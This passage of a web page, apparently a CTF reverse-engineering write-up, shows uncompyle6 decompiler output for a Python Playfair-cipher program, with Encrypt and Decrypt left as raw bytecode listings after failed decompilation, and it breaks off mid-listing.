class="line">427</span><br><span class="line">428</span><br><span class="line">429</span><br><span class="line">430</span><br><span class="line">431</span><br><span class="line">432</span><br><span class="line">433</span><br><span class="line">434</span><br><span class="line">435</span><br><span class="line">436</span><br><span class="line">437</span><br><span class="line">438</span><br><span class="line">439</span><br><span class="line">440</span><br><span class="line">441</span><br><span class="line">442</span><br><span class="line">443</span><br><span class="line">444</span><br><span class="line">445</span><br><span class="line">446</span><br><span class="line">447</span><br><span class="line">448</span><br><span class="line">449</span><br><span class="line">450</span><br><span class="line">451</span><br><span class="line">452</span><br><span class="line">453</span><br><span class="line">454</span><br><span class="line">455</span><br><span class="line">456</span><br><span class="line">457</span><br><span class="line">458</span><br><span class="line">459</span><br><span class="line">460</span><br><span class="line">461</span><br><span class="line">462</span><br><span class="line">463</span><br><span class="line">464</span><br><span class="line">465</span><br><span class="line">466</span><br><span class="line">467</span><br><span class="line">468</span><br><span class="line">469</span><br><span class="line">470</span><br><span class="line">471</span><br><span class="line">472</span><br><span class="line">473</span><br><span class="line">474</span><br><span class="line">475</span><br><span class="line">476</span><br><span class="line">477</span><br><span class="line">478</span><br><span class="line">479</span><br><span class="line">480</span><br><span class="line">481</span><br><span class="line">482</span><br><span class="line">483</span><br><span class="line">484</span><br><span class="line">485</span><br><span class="line">486</span><br><span class="line">487</span><br><span class="line">488</span><br><span class="line">489</span><br><span class="line">490</span><br><span class="line">491</span><br><span class="line">492</span><br><span class="line">493</span><br><span class="line">494</span><br><span class="line">495</span><br><span class="line">496</span><br><span class="line">497</span><br><span class="line">498</span><br><span class="line">499</span><br><span class="line">500</span><br><span class="line">501</span><br><span class="line">502</span><br><span class="line">503</span><br><span class="line">504</span><br><span class="line">505</span><br><span class="line">506</span><br><span class="line">507</span><br><span class="line">508</span><br><span class="line">509</span><br><span class="line">510</span><br><span class="line">511</span><br><span class="line">512</span><br><span class="line">513</span><br><span class="line">514</span><br><span class="line">515</span><br><span class="line">516</span><br><span class="line">517</span><br><span class="line">518</span><br><span class="line">519</span><br><span class="line">520</span><br><span class="line">521</span><br><span class="line">522</span><br><span class="line">523</span><br><span class="line">524</span><br><span class="line">525</span><br><span class="line">526</span><br><span class="line">527</span><br><span class="line">528</span><br><span class="line">529</span><br><span class="line">530</span><br><span class="line">531</span><br><span class="line">532</span><br><span class="line">533</span><br><span class="line">534</span><br><span class="line">535</span><br><span class="line">536</span><br><span class="line">537</span><br><span class="line">538</span><br><span class="line">539</span><br><span class="line">540</span><br><span class="line">541</span><br><span class="line">542</span><br><span class="line">543</span><br><span class="line">544</span><br><span class="line">545</span><br><span class="line">546</span><br><span class="line">547</span><br><span class="line">548</span><br><span class="line">549</span><br><span class="line">550</span><br><span class="line">551</span><br><span class="line">552</span><br><span class="line">553</span><br><span class="line">554</span><br><span class="line">555</span><br><span class="line">556</span><br><span class="line">557</span><br><span class="line">558</span><br><span class="line">559</span><br><span class="line">560</span><br><span class="line">561</span><br><span class="line">562</span><br><span class="line">563</span><br><span class="line">564</span><br><span class="line">565</span><br><span class="line">566</span><br><span class="line">567</span><br><span class="line">568</span><br><span class="line">569</span><br><span class="line">570</span><br><span class="line">571</span><br><span class="line">572</span><br><span class="line">573</span><br><span class="line">574</span><br><span class="line">575</span><br><span class="line">576</span><br><span class="line">577</span><br><span class="line">578</span><br><span class="line">579</span><br><span class="line">580</span><br><span class="line">581</span><br><span class="line">582</span><br><span class="line">583</span><br><span class="line">584</span><br><span class="line">585</span><br><span class="line">586</span><br><span class="line">587</span><br><span class="line">588</span><br><span class="line">589</span><br><span class="line">590</span><br><span class="line">591</span><br><span class="line">592</span><br><span class="line">593</span><br><span class="line">594</span><br><span class="line">595</span><br><span class="line">596</span><br><span class="line">597</span><br><span class="line">598</span><br><span class="line">599</span><br><span class="line">600</span><br><span class="line">601</span><br><span class="line">602</span><br><span class="line">603</span><br><span class="line">604</span><br><span class="line">605</span><br><span class="line">606</span><br><span class="line">607</span><br><span class="line">608</span><br><span class="line">609</span><br><span class="line">610</span><br><span class="line">611</span><br><span class="line">612</span><br><span class="line">613</span><br><span class="line">614</span><br><span class="line">615</span><br><span class="line">616</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># uncompyle6 version 3.7.3</span></span><br><span class="line"><span class="comment"># Python bytecode 3.8 (3413)</span></span><br><span class="line"><span class="comment"># Decompiled from: Python 3.8.5 (tags/v3.8.5:580fbb0, Jul 20 2020, 15:57:54) [MSC v.1924 64 bit (AMD64)]</span></span><br><span class="line"><span class="comment"># Embedded file name: ./EzPython/source.py</span></span><br><span class="line"><span class="comment"># Compiled at: 2020-07-25 16:57:06</span></span><br><span class="line"><span class="comment"># Size of source mod 2**32: 5784 bytes</span></span><br><span class="line">Instruction context:</span><br><span class="line"> </span><br><span class="line"> L. <span class="number">76</span> <span class="number">414</span> JUMP_BACK <span class="number">32</span> <span class="string">'to 32'</span></span><br><span class="line">-> 416 JUMP_FORWARD 430 'to 430'</span><br><span class="line"> <span class="number">418_0</span> COME_FROM <span class="number">60</span> <span class="string">'60'</span></span><br><span class="line">Instruction context:</span><br><span class="line"> </span><br><span class="line"> L. <span class="number">118</span> <span class="number">414</span> JUMP_BACK <span class="number">32</span> <span class="string">'to 32'</span></span><br><span class="line">-> 416 JUMP_FORWARD 430 'to 430'</span><br><span class="line"> <span class="number">418_0</span> COME_FROM <span class="number">60</span> <span class="string">'60'</span></span><br><span class="line">T_letter = [<span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Create_Matrix</span>(<span class="params">key</span>):</span></span><br><span class="line"> key = Remove_Duplicates(key)</span><br><span class="line"> key = key.replace(<span class="string">' '</span>, <span class="string">''</span>)</span><br><span class="line"> j = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(key)):</span><br><span class="line"> T_letter[j] += key[i]</span><br><span class="line"> <span class="keyword">if</span> <span class="number">0</span> == (i + <span class="number">1</span>) % <span class="number">5</span>:</span><br><span class="line"> j += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Remove_Duplicates</span>(<span class="params">key</span>):</span></span><br><span class="line"> key = key.upper()</span><br><span class="line"> _key = <span class="string">''</span></span><br><span class="line"> <span class="keyword">for</span> ch <span class="keyword">in</span> key:</span><br><span class="line"> <span class="keyword">if</span> ch == <span class="string">'I'</span>:</span><br><span class="line"> ch = <span class="string">'J'</span></span><br><span class="line"> <span class="keyword">if</span> ch <span class="keyword">in</span> _key:</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> _key += ch</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> _key</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Get_MatrixIndex</span>(<span class="params">ch</span>):</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(T_letter)):</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(T_letter)):</span><br><span class="line"> <span class="keyword">if</span> ch == T_letter[i][j]:</span><br><span class="line"> <span class="keyword">return</span> (</span><br><span class="line"> i, j)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Encrypt</span>--- <span class="title">This</span> <span class="title">code</span> <span class="title">section</span> <span class="title">failed</span>:</span> ---</span><br><span class="line"></span><br><span class="line"> L. <span class="number">44</span> <span class="number">0</span> LOAD_STR <span class="string">''</span></span><br><span class="line"> <span class="number">2</span> STORE_FAST <span class="string">'ciphertext'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">46</span> <span class="number">4</span> LOAD_GLOBAL <span class="built_in">len</span></span><br><span class="line"> <span class="number">6</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">8</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">10</span> LOAD_CONST <span class="number">2</span></span><br><span class="line"> <span class="number">12</span> BINARY_MODULO </span><br><span class="line"> <span class="number">14</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">16</span> COMPARE_OP !=</span><br><span class="line"> <span class="number">18</span> POP_JUMP_IF_FALSE <span class="number">28</span> <span class="string">'to 28'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">47</span> <span class="number">20</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">22</span> LOAD_STR <span class="string">'Z'</span></span><br><span class="line"> <span class="number">24</span> INPLACE_ADD </span><br><span class="line"> <span class="number">26</span> STORE_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">28_0</span> COME_FROM <span class="number">18</span> <span class="string">'18'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">49</span> <span class="number">28</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">30</span> STORE_FAST <span class="string">'i'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">50</span> <span class="number">32</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">34</span> LOAD_GLOBAL <span class="built_in">len</span></span><br><span class="line"> <span class="number">36</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">38</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">40</span> COMPARE_OP <</span><br><span class="line"> <span class="number">42_44</span> POP_JUMP_IF_FALSE <span class="number">440</span> <span class="string">'to 440'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">51</span> <span class="number">46</span> LOAD_CONST <span class="literal">True</span></span><br><span class="line"> <span class="number">48</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">50</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">52</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">54</span> LOAD_METHOD isalpha</span><br><span class="line"> <span class="number">56</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"> <span class="number">58</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">60_62</span> POP_JUMP_IF_FALSE <span class="number">418</span> <span class="string">'to 418'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">52</span> <span class="number">64</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">66</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">68</span> BINARY_ADD </span><br><span class="line"> <span class="number">70</span> STORE_FAST <span class="string">'j'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">53</span> <span class="number">72</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">74</span> LOAD_GLOBAL <span class="built_in">len</span></span><br><span class="line"> <span class="number">76</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">78</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">80</span> COMPARE_OP <</span><br><span class="line"> <span class="number">82_84</span> POP_JUMP_IF_FALSE <span class="number">406</span> <span class="string">'to 406'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">54</span> <span class="number">86</span> LOAD_CONST <span class="literal">True</span></span><br><span class="line"> <span class="number">88</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">90</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">92</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">94</span> LOAD_METHOD isalpha</span><br><span class="line"> <span class="number">96</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"> <span class="number">98</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">100_102</span> POP_JUMP_IF_FALSE <span class="number">396</span> <span class="string">'to 396'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">55</span> <span class="number">104</span> LOAD_STR <span class="string">'I'</span></span><br><span class="line"> <span class="number">106</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">108</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">110</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">112</span> LOAD_METHOD upper</span><br><span class="line"> <span class="number">114</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"> <span class="number">116</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">118</span> POP_JUMP_IF_FALSE <span class="number">130</span> <span class="string">'to 130'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">56</span> <span class="number">120</span> LOAD_GLOBAL Get_MatrixIndex</span><br><span class="line"> <span class="number">122</span> LOAD_STR <span class="string">'J'</span></span><br><span class="line"> <span class="number">124</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">126</span> STORE_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">128</span> JUMP_FORWARD <span class="number">146</span> <span class="string">'to 146'</span></span><br><span class="line"> <span class="number">130_0</span> COME_FROM <span class="number">118</span> <span class="string">'118'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">58</span> <span class="number">130</span> LOAD_GLOBAL Get_MatrixIndex</span><br><span class="line"></span><br><span class="line"> L. <span class="number">59</span> <span class="number">132</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">134</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">136</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">138</span> LOAD_METHOD upper</span><br><span class="line"> <span class="number">140</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">58</span> <span class="number">142</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">144</span> STORE_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">146_0</span> COME_FROM <span class="number">128</span> <span class="string">'128'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">60</span> <span class="number">146</span> LOAD_STR <span class="string">'I'</span></span><br><span class="line"> <span class="number">148</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">150</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">152</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">154</span> LOAD_METHOD upper</span><br><span class="line"> <span class="number">156</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"> <span class="number">158</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">160</span> POP_JUMP_IF_FALSE <span class="number">172</span> <span class="string">'to 172'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">61</span> <span class="number">162</span> LOAD_GLOBAL Get_MatrixIndex</span><br><span class="line"> <span class="number">164</span> LOAD_STR <span class="string">'J'</span></span><br><span class="line"> <span class="number">166</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">168</span> STORE_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">170</span> JUMP_FORWARD <span class="number">188</span> <span class="string">'to 188'</span></span><br><span class="line"> <span class="number">172_0</span> COME_FROM <span class="number">160</span> <span class="string">'160'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">63</span> <span class="number">172</span> LOAD_GLOBAL Get_MatrixIndex</span><br><span class="line"> <span class="number">174</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">176</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">178</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">180</span> LOAD_METHOD upper</span><br><span class="line"> <span class="number">182</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"> <span class="number">184</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">186</span> STORE_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">188_0</span> COME_FROM <span class="number">170</span> <span class="string">'170'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">65</span> <span class="number">188</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">190</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">192</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">194</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">196</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">198</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">200</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">202_204</span> POP_JUMP_IF_FALSE <span class="number">268</span> <span class="string">'to 268'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">66</span> <span class="number">206</span> LOAD_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">208</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">210</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">212</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">214</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">216</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">218</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">220</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">222</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">224</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">226</span> BINARY_ADD </span><br><span class="line"></span><br><span class="line"> L. <span class="number">67</span> <span class="number">228</span> LOAD_CONST <span class="number">5</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">66</span> <span class="number">230</span> BINARY_MODULO </span><br><span class="line"> <span class="number">232</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. <span class="number">67</span> <span class="number">234</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">236</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">238</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">240</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">242</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">244</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">246</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">248</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">250</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">252</span> BINARY_ADD </span><br><span class="line"> <span class="number">254</span> LOAD_CONST <span class="number">5</span></span><br><span class="line"> <span class="number">256</span> BINARY_MODULO </span><br><span class="line"> <span class="number">258</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. <span class="number">66</span> <span class="number">260</span> BINARY_ADD </span><br><span class="line"> <span class="number">262</span> INPLACE_ADD </span><br><span class="line"> <span class="number">264</span> STORE_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">266</span> JUMP_ABSOLUTE <span class="number">406</span> <span class="string">'to 406'</span></span><br><span class="line"> <span class="number">268_0</span> COME_FROM <span class="number">202</span> <span class="string">'202'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">68</span> <span class="number">268</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">270</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">272</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">274</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">276</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">278</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">280</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">282_284</span> POP_JUMP_IF_FALSE <span class="number">348</span> <span class="string">'to 348'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">69</span> <span class="number">286</span> LOAD_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">288</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">290</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">292</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">294</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">296</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">298</span> BINARY_ADD </span><br><span class="line"></span><br><span class="line"> L. <span class="number">70</span> <span class="number">300</span> LOAD_CONST <span class="number">5</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">69</span> <span class="number">302</span> BINARY_MODULO </span><br><span class="line"> <span class="number">304</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. <span class="number">70</span> <span class="number">306</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">308</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">310</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. <span class="number">69</span> <span class="number">312</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. <span class="number">70</span> <span class="number">314</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">316</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">318</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">320</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">322</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">324</span> BINARY_ADD </span><br><span class="line"> <span class="number">326</span> LOAD_CONST <span class="number">5</span></span><br><span class="line"> <span class="number">328</span> BINARY_MODULO </span><br><span class="line"> <span class="number">330</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">332</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">334</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">336</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">338</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. <span class="number">69</span> <span class="number">340</span> BINARY_ADD </span><br><span class="line"> <span class="number">342</span> INPLACE_ADD </span><br><span class="line"> <span class="number">344</span> STORE_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">346</span> JUMP_ABSOLUTE <span class="number">406</span> <span class="string">'to 406'</span></span><br><span class="line"> <span class="number">348_0</span> COME_FROM <span class="number">282</span> <span class="string">'282'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">72</span> <span class="number">348</span> LOAD_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">350</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">352</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">354</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">356</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">358</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">360</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">362</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">364</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">366</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">368</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">370</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">372</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">374</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">376</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">378</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">380</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">382</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">384</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">386</span> BINARY_ADD </span><br><span class="line"> <span class="number">388</span> INPLACE_ADD </span><br><span class="line"> <span class="number">390</span> STORE_FAST <span class="string">'ciphertext'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">73</span> <span class="number">392_394</span> BREAK_LOOP <span class="number">406</span> <span class="string">'to 406'</span></span><br><span class="line"> <span class="number">396_0</span> COME_FROM <span class="number">100</span> <span class="string">'100'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">74</span> <span class="number">396</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">398</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">400</span> INPLACE_ADD </span><br><span class="line"> <span class="number">402</span> STORE_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">404</span> JUMP_BACK <span class="number">72</span> <span class="string">'to 72'</span></span><br><span class="line"> <span class="number">406_0</span> COME_FROM <span class="number">82</span> <span class="string">'82'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">75</span> <span class="number">406</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">408</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">410</span> BINARY_ADD </span><br><span class="line"> <span class="number">412</span> STORE_FAST <span class="string">'i'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">76</span> <span class="number">414</span> JUMP_BACK <span class="number">32</span> <span class="string">'to 32'</span></span><br><span class="line"> <span class="number">416</span> JUMP_FORWARD <span class="number">430</span> <span class="string">'to 430'</span></span><br><span class="line"> <span class="number">418_0</span> COME_FROM <span class="number">60</span> <span class="string">'60'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">78</span> <span class="number">418</span> LOAD_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">420</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">422</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">424</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">426</span> INPLACE_ADD </span><br><span class="line"> <span class="number">428</span> STORE_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">430_0</span> COME_FROM <span class="number">416</span> <span class="string">'416'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">79</span> <span class="number">430</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">432</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">434</span> INPLACE_ADD </span><br><span class="line"> <span class="number">436</span> STORE_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">438</span> JUMP_BACK <span class="number">32</span> <span class="string">'to 32'</span></span><br><span class="line"> <span class="number">440_0</span> COME_FROM <span class="number">42</span> <span class="string">'42'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">81</span> <span class="number">440</span> LOAD_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">442</span> RETURN_VALUE </span><br><span class="line"> -<span class="number">1</span> RETURN_LAST </span><br><span class="line"></span><br><span class="line">Parse error at <span class="keyword">or</span> near `JUMP_FORWARD<span class="string">' instruction at offset 416</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">def Decrypt--- This code section failed: ---</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 87 0 LOAD_STR '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 2 STORE_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 88 4 LOAD_GLOBAL len</span></span><br><span class="line"><span class="string"> 6 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 8 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 10 LOAD_CONST 2</span></span><br><span class="line"><span class="string"> 12 BINARY_MODULO </span></span><br><span class="line"><span class="string"> 14 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 16 COMPARE_OP !=</span></span><br><span class="line"><span class="string"> 18 POP_JUMP_IF_FALSE 28 '</span>to <span class="number">28</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 89 20 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 22 LOAD_STR '</span>Z<span class="string">'</span></span><br><span class="line"><span class="string"> 24 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 26 STORE_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 28_0 COME_FROM 18 '</span><span class="number">18</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 91 28 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 30 STORE_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 92 32 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 34 LOAD_GLOBAL len</span></span><br><span class="line"><span class="string"> 36 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 38 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 40 COMPARE_OP <</span></span><br><span class="line"><span class="string"> 42_44 POP_JUMP_IF_FALSE 440 